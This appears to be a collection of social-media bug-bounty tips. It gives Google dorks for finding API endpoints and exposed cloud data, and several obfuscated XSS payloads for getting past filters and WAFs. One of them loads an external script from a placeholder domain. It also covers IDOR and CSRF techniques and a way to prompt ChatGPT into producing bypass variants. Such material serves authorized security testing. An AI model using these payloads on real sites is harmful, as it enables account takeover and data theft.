Google Dork - API Endpoints ⚙️
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3
Find juicy API Endpoints for further testing 🎯
Google Dorks - Part 5
Other search engines:
Example:
site:tesla[.]com -site:ir.tesla[.]com
Find hidden endpoints not on Google
#recon
#bugbountytips
#seo
#infosec
XSS-Bypass Anatomy
Final payload after working hours on a bug bounty target w/ both XSS filters & WAF:
%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
Tips for getting into bug bounty and web pentesting:
1. Don't worry about certs, just hack or build something
2.
@PortSwigger
Web Security Academy:
3. Hack on a VDP until you get your first vuln
4. Build a tool or web app
#bugbountytips
#infosec
XSS Bypass - slice + external script
Payload:
<svg onload=eval(location.hash.slice(1))>
Put this at the end of the URL:
#with
(document)body.appendChild(createElement('script')).src='//domain'
More from
@brutelogic
:
#xss
#bugbountytips
#hacking
#infosec
XSS Bypass - javascript: URI
If you can inject these tags:
<a> <iframe> <object> <embed>
But, "javascript:" & "data:" are blocked
Try these obfuscation techniques:
java%00script:
java%0Ascript:
java&tab;script:
Example:
<a href="java%0Ascript:al%0Aert()">click</a>
Google Dork - Find Bug Bounty programs:
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de
Last two bits reduce noise, but you can remove them.
#bugbountytips
#bugbounty
#infosec
XSS filter bypass:
<embed src="javascript%26%63%6f%6c%6f%6e%3balert()">
The url encoded portion is the html entity for colon:
:
#bugbountytips
#bugbounty
#XSS
XSS Fuzzing w/ ChatGPT
Prompt
#1
:
explain this: javascript:alert()
Prompt
#2
:
show me alternatives
Customize Bypass:
list 10 that don't use the word "alert" intact
XSS on a login page while stuck in an input tag with <> filtered. Final Payload:
" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""
Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation.
#BugBountyTips
#bugbounty
#XSS
Weird IDOR I've never seen before:
1. User 1 updates at /api/account
2. User 2 registers at /api/register
3. Change userID for /api/register from User 2 -> User 1
🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint
#bugbountytips
#infosec
New blog post: Hack rich text editors for XSS
This is the method I use anytime I see a rich text editor embedded in a bug bounty or pentesting target.
#xss
#bugbountytips
#infosec
#hacking
P1 IDORs & BAC w/ Auth Analyzer Burp Extension:
1. Copy/paste session cookies from different users
2. Start Analyzer
3. Do things in browser w/ user 1
4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1
#bugbountytips
#hacking
Google Dork - Unlisted Bug Bounty Programs 🐛
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com
Some programs don't want to be listed in the directory; you can only access them directly via their site.
Google Dorks - OneDrive, Firebase, and JFrog Artifactory:
site: "example[.]com"
site: "example[.]com"
site: "example[.]com"
Find sensitive data and company accounts
#recon
#bugbountytips
#infosec
#seo
Easy CSRF and POST XSS PoC:
1. "Generate CSRF PoC" in Burp
2. Copy HTML
3. Paste into Decoder
4. Encode as Base64 and copy output
5. Paste it to the end of this URI:
data:text/html;base64,<Base64 here>
6. Open the link to activate CSRF
#bugbountytips
#csrf
#xss
#infosec
🚀 Ready to level up your Burp Suite game? Check out my latest Medium article packed with tips & tricks to supercharge your workflow!
From filtering proxy history to must-have extensions, we've got you covered!
🌐🔥 Read & share:
#bugbountytips